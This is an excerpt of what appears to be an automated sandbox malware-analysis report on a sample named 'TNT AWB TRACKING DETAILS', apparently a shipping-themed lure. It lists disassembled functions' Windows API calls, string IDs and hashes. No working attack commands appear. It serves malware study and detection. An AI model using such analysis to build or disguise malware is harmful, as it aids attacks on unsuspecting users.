                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 3974292440-719923060
                                                    • Opcode ID: 5c77c48e5d6a287361cdc56f00bea30cbd0fc20df245ba8d1132a93baab8f149
                                                    • Instruction ID: 186359c6b12c36b49852e36b5fa0f79df187379d8839598368dc7c0deab75cf1
                                                    • Opcode Fuzzy Hash: 5c77c48e5d6a287361cdc56f00bea30cbd0fc20df245ba8d1132a93baab8f149
                                                    • Instruction Fuzzy Hash: 38A19E316043019BCB04EF24C955F6AB7E5BF85324F14886DBC6AAB392CB71ED4ADB41
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F1A47A
                                                    • __swprintf.LIBCMT ref: 00F1A51B
                                                    • _wcscmp.LIBCMT ref: 00F1A52E
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F1A583
                                                    • _wcscmp.LIBCMT ref: 00F1A5BF
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00F1A5F6
                                                    • GetDlgCtrlID.USER32(?), ref: 00F1A648
                                                    • GetWindowRect.USER32(?,?), ref: 00F1A67E
                                                    • GetParent.USER32(?), ref: 00F1A69C
                                                    • ScreenToClient.USER32(00000000), ref: 00F1A6A3
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F1A71D
                                                    • _wcscmp.LIBCMT ref: 00F1A731
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00F1A757
                                                    • _wcscmp.LIBCMT ref: 00F1A76B
                                                      • Part of subcall function 00EE362C: _iswctype.LIBCMT ref: 00EE3634
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                    • String ID: %s%u
                                                    • API String ID: 3744389584-679674701
                                                    • Opcode ID: c137e749726f3a4d6ef2d0d0fc6b1da2e13d23afee9bd0eddcfb3b326c946fe2
                                                    • Instruction ID: 7d80318b96cf7ae744c9b3088fc5345703950a16edac6b0330b0a5dad517bb8f
                                                    • Opcode Fuzzy Hash: c137e749726f3a4d6ef2d0d0fc6b1da2e13d23afee9bd0eddcfb3b326c946fe2
                                                    • Instruction Fuzzy Hash: B2A1F331605306AFD715DF60C884FEAB7E8FF44320F048529F999D2190EB30EA99DB92
                                                    APIs
                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00F1AF18
                                                    • _wcscmp.LIBCMT ref: 00F1AF29
                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00F1AF51
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00F1AF6E
                                                    • _wcscmp.LIBCMT ref: 00F1AF8C
                                                    • _wcsstr.LIBCMT ref: 00F1AF9D
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F1AFD5
                                                    • _wcscmp.LIBCMT ref: 00F1AFE5
                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00F1B00C
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F1B055
                                                    • _wcscmp.LIBCMT ref: 00F1B065
                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00F1B08D
                                                    • GetWindowRect.USER32(00000004,?), ref: 00F1B0F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 1788623398-1539354611
                                                    • Opcode ID: 7de10fe9fa8d798a7c26a79861790fb6ec965a944621cc6e71db48f9038a6c5d
                                                    • Instruction ID: e0651819925e28992d764b39964d03d50698e4175960158fd0de12bbb0e63744
                                                    • Opcode Fuzzy Hash: 7de10fe9fa8d798a7c26a79861790fb6ec965a944621cc6e71db48f9038a6c5d
                                                    • Instruction Fuzzy Hash: C281C271508309EFDB04DF20C885FAA77D8EF44324F04846AFD999A096DB34DD8ADB61
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                    • API String ID: 1038674560-1810252412
                                                    • Opcode ID: 784ecc65eb59a91ac838782fa9aa0b96162d059ba291cc3ffd36a10656a91168
                                                    • Instruction ID: ae0af8d19f5a7ab1201a988716d1035a9ad8b32043cfb58559089f970691313e
                                                    • Opcode Fuzzy Hash: 784ecc65eb59a91ac838782fa9aa0b96162d059ba291cc3ffd36a10656a91168
                                                    • Instruction Fuzzy Hash: BF319231948309A6FA10FA64DE03FEE77A49B10720F20502EF455710E1EA66AF44AA93
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00F35013
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F3501E
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00F35029
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00F35034
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00F3503F
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00F3504A
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00F35055
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00F35060
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00F3506B
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00F35076
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00F35081
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00F3508C
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00F35097
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00F350A2
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00F350AD
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00F350B8
                                                    • GetCursorInfo.USER32(?), ref: 00F350C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$Info
                                                    • String ID:
                                                    • API String ID: 2577412497-0
                                                    • Opcode ID: 6d798757a61b3deb139544fa78e621cb699fdae6f21604514787d2e46a44dd2f
                                                    • Instruction ID: c3017f0e30a0ca20ce63302ebe7866c4cd2a372ac8373398ff2eb933bf451819
                                                    • Instruction Fuzzy Hash: C23115B1D0831E6ADF109FB68C8995FBFE8FF04760F50452AA50CE7280DA79A5008F91
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F4A259
                                                    • DestroyWindow.USER32(00000000,?), ref: 00F4A2D3
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F4A34D
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F4A36F
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F4A382
                                                    • DestroyWindow.USER32(00000000), ref: 00F4A3A4
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EC0000,00000000), ref: 00F4A3DB
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F4A3F4
                                                    • GetDesktopWindow.USER32 ref: 00F4A40D
                                                    • GetWindowRect.USER32(00000000), ref: 00F4A414
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F4A42C
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F4A444
                                                      • Part of subcall function 00EC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EC25EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 1297703922-3619404913
                                                    • Opcode ID: 8f4f21d461f9f838558700dd82c06dca2d0fc5fe8eba41eb4d5587dcb59181f9
                                                    • Instruction ID: 670d788c1c1392243cbfa7fc6878bb3a8ed0bfd71cc6995fcf3318fd0509c4e4
                                                    • Instruction Fuzzy Hash: DF719A74580208AFD720CF28CC48FAA7BE6FB99710F04451DFD89972B0D775A946EB52
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • DragQueryPoint.SHELL32(?,?), ref: 00F4C627
                                                      • Part of subcall function 00F4AB37: ClientToScreen.USER32(?,?), ref: 00F4AB60
                                                      • Part of subcall function 00F4AB37: GetWindowRect.USER32(?,?), ref: 00F4ABD6
                                                      • Part of subcall function 00F4AB37: PtInRect.USER32(?,?,00F4C014), ref: 00F4ABE6
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F4C690
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F4C69B
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F4C6BE
                                                    • _wcscat.LIBCMT ref: 00F4C6EE
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F4C705
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F4C71E
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F4C735
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F4C757
                                                    • DragFinish.SHELL32(?), ref: 00F4C75E
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F4C851
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                    • API String ID: 169749273-3440237614
                                                    • Opcode ID: 748a8b8f808f7099fc6c75f2bba1a9c2ff1ad1833049aede97c02fe7d2f31538
                                                    • Instruction ID: 91917c2ff3d7011f3d024576ccfcec37771714d5ab826279db353b973d363756
                                                    • Instruction Fuzzy Hash: 9A61AD71108304AFC701EF64CD85EAFBBE8EF89750F00092EF999931A1DB319949DB92
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00F44424
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F4446F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-4258414348
                                                    • Opcode ID: 724dce268cca03ccf71d6b462172fc587ce81bce93031f5cfad2746461949ae8
                                                    • Instruction ID: 023ef7515c65fe717e5609da95009a5108a670512185f0da68c695e1f076b4e1
                                                    • Instruction Fuzzy Hash: 09916D716047019BCB04EF10C951B6EBBE1AF95350F05846CEC966B3A3CB75ED8AEB81
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F4B8B4
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F491C2), ref: 00F4B910
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F4B949
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F4B98C
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F4B9C3
                                                    • FreeLibrary.KERNEL32(?), ref: 00F4B9CF
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F4B9DF
                                                    • DestroyIcon.USER32(?,?,?,?,?,00F491C2), ref: 00F4B9EE
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F4BA0B
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F4BA17
                                                      • Part of subcall function 00EE2EFD: __wcsicmp_l.LIBCMT ref: 00EE2F86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                    • String ID: .dll$.exe$.icl
                                                    • API String ID: 1212759294-1154884017
                                                    • Opcode ID: cbc5a3275037e93e8febdedf3f1ed9aa76444bdff3d78bbbfc6e2de1d8404c6a
                                                    • Instruction ID: 808837f1753527cc03b8ec64285e2f81e8d11fe2399f507998a9f99cea3ea057
                                                    • Instruction Fuzzy Hash: 2D61CD71940219BAEB14DF64CC45FBA7BACEB08720F10411AFE15E61D2DB74DA81EBA0
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 00F2DCDC
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F2DCEC
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F2DCF8
                                                    • __wsplitpath.LIBCMT ref: 00F2DD56
                                                    • _wcscat.LIBCMT ref: 00F2DD6E
                                                    • _wcscat.LIBCMT ref: 00F2DD80
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F2DD95
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2DDA9
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2DDDB
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2DDFC
                                                    • _wcscpy.LIBCMT ref: 00F2DE08
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F2DE47
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                    • String ID: *.*
                                                    • API String ID: 3566783562-438819550
                                                    • Opcode ID: ac70b9c23083d93013d6f85edf5d2556a886219e961f7c2166a2ef774a595680
                                                    • Instruction ID: 562c9970ffa6b516f46d58881248e2aba26a9c9e7f157184bfe4f2d9f6f48e4e
                                                    • Instruction Fuzzy Hash: E3618A725042559FCB10EF60D844EAEB3E8FF89320F04892EF98997251DB35EA45CB92
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00F29C7F
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F29CA0
                                                    • __swprintf.LIBCMT ref: 00F29CF9
                                                    • __swprintf.LIBCMT ref: 00F29D12
                                                    • _wprintf.LIBCMT ref: 00F29DB9
                                                    • _wprintf.LIBCMT ref: 00F29DD7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 311963372-3080491070
                                                    • Opcode ID: 4649178950d087b7239af34047ea6c9ee64bb4c3dcc8e9a9c656dd3c72f61f9f
                                                    • Instruction ID: 33fdb3c29eb9fa33702b07f5ada6999d4b77e1800081b0f72240bc3decbf50af
                                                    • Instruction Fuzzy Hash: DA51B53290050AABCF14EBE0DE46EEEB7B8AF14310F500065F50972061DB726F5AEF61
                                                    APIs
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • CharLowerBuffW.USER32(?,?), ref: 00F2A3CB
                                                    • GetDriveTypeW.KERNEL32 ref: 00F2A418
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F2A460
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F2A497
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F2A4C5
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 2698844021-4113822522
                                                    • Opcode ID: 83093b81bd6bf216fd80d2f20eb95b86e3efded9b30fcd311590315aec55647a
                                                    • Instruction ID: 8ce96c069e4318cb7163db7cb240220e19619f10b749b5660572aafa657597eb
                                                    • Instruction Fuzzy Hash: 00515C725043059FC700EF20C985D6AB7E4FF98758F00886DF89A67262DB72ED0ADB52
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00EFE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00F1F8DF
                                                    • LoadStringW.USER32(00000000,?,00EFE029,00000001), ref: 00F1F8E8
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • GetModuleHandleW.KERNEL32(00000000,00F85310,?,00000FFF,?,?,00EFE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00F1F90A
                                                    • LoadStringW.USER32(00000000,?,00EFE029,00000001), ref: 00F1F90D
                                                    • __swprintf.LIBCMT ref: 00F1F95D
                                                    • __swprintf.LIBCMT ref: 00F1F96E
                                                    • _wprintf.LIBCMT ref: 00F1FA17
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F1FA2E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 984253442-2268648507
                                                    • Opcode ID: 6eed7382b1d449eff118dfe6d87919392fe4cf23d4cfb2e1cf8ec32fde06281c
                                                    • Instruction ID: 71929d0b5d5b0f95d912ec193d980c2201f674940b0409502b77deb03875daea
                                                    • Instruction Fuzzy Hash: 7A41457290410DAACF04FBE0DE46EEEB7B8AF58350F501069F505B6092DA366F4ADF61
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F49207,?,?), ref: 00F4BA56
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F49207,?,?,00000000,?), ref: 00F4BA6D
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F49207,?,?,00000000,?), ref: 00F4BA78
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00F49207,?,?,00000000,?), ref: 00F4BA85
                                                    • GlobalLock.KERNEL32(00000000), ref: 00F4BA8E
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F49207,?,?,00000000,?), ref: 00F4BA9D
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F4BAA6
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00F49207,?,?,00000000,?), ref: 00F4BAAD
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F49207,?,?,00000000,?), ref: 00F4BABE
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F52CAC,?), ref: 00F4BAD7
                                                    • GlobalFree.KERNEL32(00000000), ref: 00F4BAE7
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00F4BB0B
                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00F4BB36
                                                    • DeleteObject.GDI32(00000000), ref: 00F4BB5E
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F4BB74
                                                    Memory Dump Source
